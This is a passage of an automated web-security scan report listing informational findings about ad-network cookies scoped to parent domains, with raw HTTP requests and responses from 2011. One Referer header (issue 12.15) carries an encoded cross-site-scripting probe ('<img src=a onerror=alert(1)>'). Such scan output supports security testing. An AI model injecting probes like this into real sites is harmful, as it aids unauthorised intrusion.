Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7305
Date: Sat, 17 Sep 2011 16:29:33 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
12.11. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/q1.q.seattlepostintelligencer/home;sz=300x250;net=q1;ord=2513202086;ord1=167008;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7306
Date: Sat, 17 Sep 2011 16:29:45 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
12.12. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cmadj/q1.q.seattlepostintelligencer/qo;sz=300x250;net=q1;ord=[timestamp];ord1=841037;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7305
Date: Sat, 17 Sep 2011 16:23:39 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
12.13. http://a.collective-media.net/datapair  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /datapair

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /datapair?net=an&segs=gm&op=add&rnd=1316295499352 HTTP/1.1
Host: a.collective-media.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pbid.pro-market.net/engine?site=111778;size=1x1;kw=%20-%20Search%20for%20local%20businesses,%20events,%20and%20coupons%20near%20you;siteref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue;rnd=(1316295499352)
Cookie: cli=121773f9380f32f; dc=sea; nadp=1; exdp=1; ibvr=1; targ=1; brlg=1

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: image/gif
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 42
Date: Sat, 17 Sep 2011 16:55:33 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

GIF89a.............!.......,...........D.;
12.14. http://a.collective-media.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 403 Forbidden
Content-Type: text/html
Vary: Accept-Encoding
Cache-Control: no-cache
Date: Sat, 17 Sep 2011 16:27:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
Content-Length: 93

<html><body><h1>403 Forbidden</h1>
Request forbidden by administrative rules.
</body></html>
12.15. http://a.netmng.com/hic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hic/?nm_width=728&nm_height=90&nm_publ=140&nm_c=200&beacon=2010june&url=[URL_ENCODED_REFERER]&passback HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.gather.com/426d8%3Cimg%20src%3da%20onerror%3dalert(1)%3E31b7c6065d67ada9d?recentId=1688849889241963&qualityCommentWidth=350&url=http%3A%2F%2Fwww.gather.com%2F&_=
Cookie: u=5f8e79cc-32a7-4701-a3f9-9a6f407e1e04; cdb0=3.113127277138.2266; cdbp=0,19,0; cdb1=; cdb2=; cdb3=; evo5=y9dly9jlztlwn%7Cjt7hNTHSSalmkggJVXyhSde8uI0RYi0avPF9AY0XnbifcaFEMqtkWSNsqllaE9MQ5Qvh0ZHmhqMXkAoIXTUGZU9nxLLIhNudmIQN5of6vB4vDh9TPU%2BkidUnQnV8lGXbiXqzET%2B0owFsOY7lmNgxGEOtTQL1bpTEu6BKOYjD3vTaje3s7aq%2FXcF3VvAicm1lQLkj%2F4xYqajg6Hkhv3ajvfa0hDJicTSwWGgqJ3fkbNkq9P4Mn239%2FQZw1Oa1JeikVeYM4LDw69dHPcDMp640B018JRk419t7Ybt5PBcN%2B25GW5unwqzZ2QVrp2Do7sfbM50SDnIEvNKt%2BPwZ2q03xWEMWAygZ%2FHwhgko6UaL4l%2BDTKIK8G1sxYFjM8jeCaYRUCGPp56861XA%2FW%2FAabxKZO%2BDbQf4VcwQUPcIlH%2B70bVPJbw0lZSaD6n%2BtWQUI%2FiCfdnf2z2Mx6yFnIeqaD2HT7ziMAgr0%2BG9nfxa8YdgSVk9uYu8ZOaM6tn81eFLhaNX

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 17:04:23 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Thu, 15 Sep 2011 17:04:23 GMT
Last-Modified: Thu, 15 Sep 2011 17:04:23 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_display=%2BVh8H0s8fTT%2FyJTublM%2BiWVvC2%2BXgxUbUPO2JPfLmxQPJcLjX5qzTkpiNBBPst0wI%2BlXbtBUthwow7WNwjS2LQ%3D%3D; expires=Mon, 22-Aug-44591 17:04:23 GMT; path=/; domain=.netmng.com
Content-Length: 768
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.Net_Mining_Evolution/B3846296.4;sz=728x90;ord=1316279063?"WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no
...[SNIP]...
12.16. http://a.netmng.com/opt-out.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /opt-out.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /opt-out.php?s=v HTTP/1.1
Host: a.netmng.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: u=5f8e79cc-32a7-4701-a3f9-9a6f407e1e04; cdb0=3.113127277138.2266; cdbp=0,19,0; cdb1=; cdb2=; cdb3=; evo5=y9dly9jlztlwn%7Cjt7hNTHSSalmkggJVXyhSde8uI0RYi0avPF9AY0XnbifcaFEMqtkWSNsqllaE9MQ5Qvh0ZHmhqMXkAoIXTUGZU9nxLLIhNudmIQN5of6vB4vDh9TPU%2BkidUnQnV8lGXbiXqzET%2B0owFsOY7lmNgxGEOtTQL1bpTEu6BKOYjD3vTaje3s7aq%2FXcF3VvAicm1lQLkj%2F4xYqajg6Hkhv3ajvfa0hDJicTSwWGgqJ3fkbNkq9P4Mn239%2FQZw1Oa1JeikVeYM4LDw69dHPcDMp640B018JRk419t7Ybt5PBcN%2B25GW5unwqzZ2QVrp2Do7sfbM50SDnIEvNKt%2BPwZ2q03xWEMWAygZ%2FHwhgko6UaL4l%2BDTKIK8G1sxYFjM8jeCaYRUCGPp56861XA%2FW%2FAabxKZO%2BDbQf4VcwQUPcIlH%2B70bVPJbw0lZSaD6n%2BtWQUI%2FiCfdnf2z2Mx6yFnIeqaD2HT7ziMAgr0%2BG9nfxa8YdgSVk9uYu8ZOaM6tn81eFLhaNX; evo5_ii=dO%2BC9yz0%2BHoOHUu%2BCgM3YfT1aBj%2BY6%2FIf7Tps%2FoVMpWD5Gr7Ra7NSyGocktMCvFNqs4KrM2Kn1Ptd%2FHmBCVefA%3D%3D; evo5_display=SzT%2BmqB9THXf0Unuooe6Q6WIWFwBue6%2BSNvxxjC2cJM%3D

Response

HTTP/1.1 302 Found
Date: Sat, 17 Sep 2011 17:19:26 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Set-Cookie: EVO5_OPT=1; expires=Tue, 14-Sep-2021 17:19:26 GMT; path=/; domain=.netmng.com
Set-Cookie: evo5=deleted; expires=Fri, 17-Sep-2010 17:19:25 GMT; path=/; domain=.netmng.com
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 0
Connection: close
Content-Type: text/html

12.17. http://a.raasnet.com/a  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.raasnet.com
Path:   /a

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a?t=nai&type=o&nocache=0.4826675 HTTP/1.1
Host: a.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Thu, 01-Jan-1970 00:00:00 GMT;
Set-Cookie: o=9; path=/; domain=.raasnet.com; expires=Thu, 22-Jan-2037 23:01:43 GMT;
Set-Cookie: ubd=AtEmSNACJQAAA8ZOQvzu; path=/; domain=.raasnet.com; expires=Thu, 01-Jan-1970 00:00:00 GMT;
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 0
Date: Sat, 17 Sep 2011 16:48:23 GMT
Connection: close

12.18. http://a.rfihub.com/nai_opt_out_1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /nai_opt_out_1.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /nai_opt_out_1.gif?nocache=0.7176568 HTTP/1.1
Host: a.rfihub.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: n="aACQavnAQ==AE2343AAABMZvbgfg=AE2343AAABMZvbWAw="; u="aABsGGJXg==AIansXMg==AAABMknWu-s="; e=co; a=c625155923287670489; o=1-umA5uIuTMwBQ; r=1312579868684; m="aAaTiaGGg==AI20474526AAABMknWu-s=AI20474526AAABMknV6pQ=AI20474526AAABMka9Efs=AI20474526AAABMka8Dvg=AI20474526AAABMka7tL8=AI20474526AAABMka7SwQ=AI20474526AAABMka3MEU=AI20474526AAABMka2B3E=AI20474526AAABMka0xeg=AI20474526AAABMkazSeo=AI20474526AAABMkaxcTc=AI20474526AAABMkawiH8=AI20474526AAABMkavWJA=AI20474526AAABMkauUw0=AI20474526AAABMkatxl8=AI20474526AAABMkatrbA=AI20474526AAABMkatlC8=AI20474526AAABMkXFqWM=AI20474526AAABMkXEDoM=AI20474526AAABMkWHFgY=AI20474526AAABMkWFI1s=AI20474526AAABMkWCIxU=AI20474526AAABMkWBuwk=AI20474526AAABMkWBq0c=AI20474526AAABMkWBgyM=AI20473955AAABMaqtRJE="; f="aADOmdhlA==AK1315498748AB2AAABMknWu-s=AK1315426108AC23AAABMka9Efo=AK1312828507AB1AAABMaqtRJA="; a1=1CAESEHaajgsfiZKYpJNnQ0UD374; t=1315426113499; s1=1312828513521; a2=2230616255569715877; t1=1315426113481; k="aAD__xtkw==ALnca20474526AN1306280495000AAABMknWu-s=AIneus2343AN1301511032000AAABMkWBgyI=AM-nca20474526AN1306280495000AAABMkWBgyI="

Response

HTTP/1.1 302 Found
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: a=cOPT_OUT;Path=/;Domain=.rfihub.com;Expires=Fri, 12-Sep-31 17:20:17 GMT
Set-Cookie: j=cOPT_OUT;Path=/;Domain=.rfihub.com
Cache-Control: no-cache
Location: http://a.rfihub.com/nai_opt_out_2.gif
Content-Length: 0

12.19. http://a.tribalfusion.com/j.ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /j.ad?site=seattlepicom&adSpace=ros&tagKey=117090495&th=37103964303&tKey=undefined&size=300x250&flashVer=10&ver=1.21&center=1&url=http%3A%2F%2Fwww.seattlepi.com%2F&rurl=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php&f=0&p=14624935&a=1&rnd=14633219 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=OptOut

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 16:23:45 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 489
Expires: 0
Connection: keep-alive

document.write('<script language="JavaScript" src="http://a.collective-media.net/adj/q1.q.seattlepostintelligencer/qo;sz=300x250;ord=[timestamp]?" type="text/javascript"><\/script>\r\n<noscript><a hre
...[SNIP]...
12.20. http://a.tribalfusion.com/z/i.optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /z/i.optout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /z/i.optout?f=1&success=http://www.networkadvertising.org/optout/opt_success.gif&failure=http://www.networkadvertising.org/optout/opt_failure.gif&tagKey=987828525&requestor=aLmtAZct6yKpcUcWnJrpGEJoCXSvBr1ToJoM6Mywpqjs9Ffvq2hr8nVpoIHNmZaC4PuexQUppSeEmBP3nDq5tPIpmcfFmHt29G HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ANON_ID=aXnX9qOZb3V7bEjUDvMidaWScbh5xabZbZailGc3CVs6E66XJ3bra2FuY2r9IoBuU1H2t33tkv7rNt17jRHB3318DQGPMR92kT7DnZbwUH6I0nn6WcH1j2CPGVUtZcclBVWRVYXdUo47ZbLM0728qZdZaWOdZbD0OoGTUddo7VHp3e3aArlEYjribDZbK9VeOEiAYybqSG3P3T6UCThFhZbmw0t54wIY0YVbFBub9VOeH4ZcVA4TgfKgvOJVx4vnl5n6wF8AZaWuZbjmiUZb0PqE2fpbMHLK8Sk

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 306
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 17:17:32 GMT;
Content-Type: text/html
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>
12.21. http://ad.agkn.com/iframe!t=1089!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1089!

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:19 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
12.22. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50912&l=20110917164020&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 113
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=IupGj7RtQ9u6-C1hyg6pDg

sec=hom
url=http://www.stamfordadvocate.com/
dpid=90009
width=300
sub=
height=225
wgt=1
sitesection=stamford_hom

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr540956329_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 17:39:08 GMT; Path=/; HttpOnly
Set-Cookie: tr540956329_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 17:39:08 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 16:39:08 GMT
Server: lighttpd/1.4.18
Content-Length: 2149

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>540956329</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50912</z>

...[SNIP]...
12.23. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50912&l=20110917165336&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 113
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=IupGj7RtQ9u6-C1hyg6pDg

sec=hom
url=http://www.stamfordadvocate.com/
dpid=90009
width=300
sub=
height=225
wgt=1
sitesection=stamford_hom

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr472716521_1=920000:1; Domain=.auditude.com; expires=Sat, 17-Sep-2011 17:52:23 GMT; Path=/; HttpOnly
Set-Cookie: tr472716521_3=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 17:52:23 GMT; Path=/; HttpOnly
Date: Sat, 17 Sep 2011 16:52:23 GMT
Server: lighttpd/1.4.18
Content-Length: 2149

<?xml version="1.0"?>
<response version="1.4">
<smil>
<head>
<state>
<data>
<cid>472716521</cid>
<u>97df6f8f08d8730261d4b44204353b4c</u>
<z>50912</z>

...[SNIP]...
12.24. http://ad.auditude.com/adserver  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.auditude.com
Path:   /adserver

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /adserver?u=97df6f8f08d8730261d4b44204353b4c&z=50912&l=20110917163508&of=1.4&tm=15&g=1000002 HTTP/1.1
Host: ad.auditude.com
Proxy-Connection: keep-alive
Referer: http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView.swf
Content-Length: 113
Origin: http://widget.newsinc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=IupGj7RtQ9u6-C1hyg6pDg

height=225
sec=hom
width=300
dpid=90009
sub=
url=http://www.stamfordadvocate.com/
wgt=1
sitesection=stamford_hom

Response

HTTP/1.1 200 OK
Content-type: text/xml
Set-Cookie: tr865258493_1=920000:2; Domain=.auditude.com; expires=Sat, 17-Sep-2011 17:50:12 GMT; Path=/; HttpOnly
